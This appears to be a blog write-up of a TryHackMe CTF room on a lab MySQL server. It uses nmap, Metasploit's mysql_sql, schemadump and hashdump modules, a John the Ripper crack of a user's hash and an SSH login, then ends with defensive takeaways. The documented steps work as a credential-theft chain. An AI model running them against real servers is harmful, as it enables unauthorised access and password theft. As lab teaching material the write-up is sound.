Exploiting MySQL

Oct 20, 2024

Blog · CTF · Database

How to Enumerate and Exploiting an Exposed MySQL (Database) Server

💻 THM CTF Reference

image

Initial Reconnaissance

The first step in exploiting a MySQL database is identifying whether the target machine has an exposed MySQL port. By default, MySQL runs on port 3306, but this can be customized by the system administrator, so it’s important to scan for common open ports. Typically you can attempt to connect to the MySQL server using common credentials or perform a brute force attack if no rate-limiting is in place.

Example Nmap Scan: (NFS Scan highlighted)

 1root@ip-10-10-22-136:~# IP=10.10.190.97
 2root@ip-10-10-22-136:~# nmap -sS -T4 -F -oN output.txt $IP
 3
 4Starting Nmap 7.60 ( https://nmap.org ) at 2024-10-06 02:34 BST
 5Nmap scan report for ip-10-10-244-95.eu-west-1.compute.internal (10.10.244.95)
 6Host is up (0.0012s latency).
 7Not shown: 998 closed ports
 8PORT     STATE SERVICE
 922/tcp   open  ssh
103306/tcp open  mysql
11MAC Address: 02:59:70:A7:8E:95 (Unknown)
12
13Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
ℹ️
The call above uses the flag -sS to perform a stealthy SYN scan, which is faster and less detectable than a full connection scan. The -T4 flag sets the timing template to be faster than the default, balancing speed and accuracy. The -F flag specifies a fast scan that targets the top 100 most common ports. The -oN output.txt flag saves the scan results in a normal format to a file named output.txt. Finally, $IP specifies the target IP address for the scan.

Using stolen credentials

For this box we already know the credentials of the MySQL server username: root and password:password obtained previously and we’ll be using this to gain further access on the server. Once connected and authenticated using the credentials we can enumerate the database to gather more information about the system.

1root@ip-10-10-22-136:~# username=root
2root@ip-10-10-22-136:~#  mysql -h $IP -u $username -p
3Enter password: password

Enumerating MySQL using Metasploit

We’ll be using modules from Metasploit to extract information from the datbase. First thing we’ll do is submit an authenticated request to show the databases present on the MySQL server. We can do this by setting the RHOSTS, USERNAME, PASSWORD to the ip and credentials of the server and by initiating the SQL show databases query command.

 1msfconsole
 2msf6 > use auxiliary/admin/mysql/mysql_sql
 3msf6 auxiliary(admin/mysql/mysql_sql) > set RHOSTS 10.10.244.95
 4msf6 auxiliary(admin/mysql/mysql_sql) > set USERNAME root
 5msf6 auxiliary(admin/mysql/mysql_sql) > set PASSWORD password
 6msf6 auxiliary(admin/mysql/mysql_sql) > set SQL show databases
 7msf6 auxiliary(admin/mysql/mysql_sql) > options
 8
 9Module options (auxiliary/admin/mysql/mysql_sql):
10
11   Name  Current Setting  Required  Description
12   ----  ---------------  --------  -----------
13   SQL   show databases   yes       The SQL to execute.
14
15
16   Used when connecting via an existing SESSION:
17
18   Name     Current Setting  Required  Description
19   ----     ---------------  --------  -----------
20   SESSION                   no        The session to run this module on
21
22
23   Used when making a new connection via RHOSTS:
24
25   Name      Current Setting  Required  Description
26   ----      ---------------  --------  -----------
27   PASSWORD  password         no        The password for the specified username
28   RHOSTS    10.10.244.95     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
29   RPORT     3306             no        The target port (TCP)
30   USERNAME  root             no        The username to authenticate as
31
32msf6 auxiliary(admin/mysql/mysql_sql) > run
33
34[*] Running module against 10.10.244.95
35
36[*] 10.10.244.95:3306 - Sending statement: 'show databases'...
37[*] 10.10.244.95:3306 -  | information_schema |
38[*] 10.10.244.95:3306 -  | mysql |
39[*] 10.10.244.95:3306 -  | performance_schema |
40[*] 10.10.244.95:3306 -  | sys |
41[*] Auxiliary module execution completed

Reading MySQL Database

We can further analyze the structure of the MySQL database by dumping the schema of all tables using the Metasploit module mysql_schemadump. This module allows us to retrieve the database schema, which includes detailed information about the structure of the databases, tables, columns, data types, and relationships between different tables within the MySQL server. This information can be critical for targeted exploitation. For example, knowing the names and structures of the tables enables us to focus on tables that likely contain sensitive information, such as users, passwords, sessions, or admin.

 1msf6 > use auxiliary/admin/mysql/mysql_schemadump
 2msf6 auxiliary(admin/mysql/mysql_schemadump) > set RHOSTS 10.10.244.95
 3msf6 auxiliary(admin/mysql/mysql_schemadump) > set USERNAME root
 4msf6 auxiliary(admin/mysql/mysql_schemadump) > set PASSWORD password
 5msf6 auxiliary(admin/mysql/mysql_schemadump) > options
 6
 7Module options (auxiliary/scanner/mysql/mysql_schemadump):
 8
 9   Name             Current Setting  Required  Description
10   ----             ---------------  --------  -----------
11   DISPLAY_RESULTS  true             yes       Display the Results to the Screen
12
13
14   Used when connecting via an existing SESSION:
15
16   Name     Current Setting  Required  Description
17   ----     ---------------  --------  -----------
18   SESSION                   no        The session to run this module on
19
20
21   Used when making a new connection via RHOSTS:
22
23   Name      Current Setting  Required  Description
24   ----      ---------------  --------  -----------
25   PASSWORD  password         no        The password for the specified username
26   RHOSTS    10.10.244.95     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
27   RPORT     3306             no        The target port (TCP)
28   THREADS   1                yes       The number of concurrent threads (maxone per host)
29   USERNAME  root             no        The username to authenticate as
30
31msf6 auxiliary(admin/mysql/mysql_schemadump) > run
32
33- TableName: x$waits_global_by_latency
34    Columns:
35    - ColumnName: events
36      ColumnType: varchar(128)
37    - ColumnName: total
38      ColumnType: bigint(20) unsigned
39    - ColumnName: total_latency
40      ColumnType: bigint(20) unsigned
41    - ColumnName: avg_latency
42      ColumnType: bigint(20) unsigned
43    - ColumnName: max_latency
44      ColumnType: bigint(20) unsigned
45
46[*] 10.10.244.95:3306 - Scanned 1 of 1 hosts (100% complete)
47[*] Auxiliary module execution completed

MySQL Hashdump

We will also use the mysql_hashdump module which is a powerful tool used to extract password hashes from a MySQL server, which can then be leveraged for further attacks. By using this module, attackers can retrieve hashed password values stored within the MySQL user table, typically located in the user table. In this case we were able to identify the entry carl with its coresponding password hash.

 1msf6 > auxiliary/scanner/mysql/mysql_hashdump
 2msf6 auxiliary(admin/mysql/mysql_hashdump) > set RHOSTS 10.10.244.95
 3msf6 auxiliary(admin/mysql/mysql_hashdump) > set USERNAME root
 4msf6 auxiliary(admin/mysql/mysql_hashdump) > set PASSWORD password
 5msf6 auxiliary(admin/mysql/mysql_hashdump) > options
 6
 7Module options (auxiliary/scanner/mysql/mysql_hashdump):
 8
 9   Used when connecting via an existing SESSION:
10
11   Name     Current Setting  Required  Description
12   ----     ---------------  --------  -----------
13   SESSION                   no        The session to run this module on
14
15
16   Used when making a new connection via RHOSTS:
17
18   Name      Current Setting  Required  Description
19   ----      ---------------  --------  -----------
20   PASSWORD  password         no        The password for the specified username
21   RHOSTS    10.10.244.95     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
22   RPORT     3306             no        The target port (TCP)
23   THREADS   1                yes       The number of concurrent threads (max one per host)
24   USERNAME  root             no        The username to authenticate as
25
26
27msf6 auxiliary(admin/mysql/mysql_hashdump) > run
28
29[+] 10.10.244.95:3306 - Saving HashString as Loot: root:
30[+] 10.10.244.95:3306 - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
31[+] 10.10.244.95:3306 - Saving HashString as Loot: mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
32[+] 10.10.244.95:3306 - Saving HashString as Loot: debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
33[+] 10.10.244.95:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
34[+] 10.10.244.95:3306 - Saving HashString as Loot: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
35[*] 10.10.244.95:3306 - Scanned 1 of 1 hosts (100% complete)
36[*] Auxiliary module execution completed

Cracking the Hash

We can use John the Ripper, a popular password-cracking tool, to reverse-engineer the hash into its original ASCII format. John the Ripper works by taking the hashed password and comparing it against a large set of potential plaintext passwords, which are hashed in the same algorithm. If it finds a match, it reveals the original password.

1root@ip-10-10-22-136:~# echo carl:*EA031893AA21444B170FC2162A56978B8CEECE18 > hash.txt
2root@ip-10-10-22-136:~# john hash.txt
3
4Proceeding with wordlist:/opt/john/password.lst
5Proceeding with incremental:ASCII
6doggie           (carl)
71g 0:00:00:02 DONE 3/3 (2024-10-06 02:57) 0.4566g/s 1043Kp/s 1043Kc/s 1043KC/s doggie..doggia
ℹ️
The call above uses John the Ripper in its default configuration, utilizing a built-in wordlist to attempt to crack the single password hash stored in the text file.

Accessing the MySQL Server

Having access to the username and password allows us to SSH directly into the server and gain access to its resources directly.

1root@ip-10-10-22-136:~# ssh carl@10.10.244.95
2carl@10.10.244.95's password: doggie
3
4Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)
5carl@polomysql:~$

Takeaways:

Credential-Based Exploitation: Gaining access to MySQL using known credentials (like root with a weak password) can lead to control over the database and server, emphasizing the importance of strong, unique credentials and limiting root access.

Metasploit Modules as Recon Tools: Metasploit’s mysql_schemadump and mysql_hashdump modules are effective for looking into database structure and extracting sensitive data like password hashes.

Importance of Salting: Salting passwords before hashing significantly strengthens security by making brute force and rainbow table attacks impractical, as each password hash becomes unique, removing the effectiveness of tools like John the Ripper. This highlights the importance of using salts in password storage to mitigate hash-cracking attacks.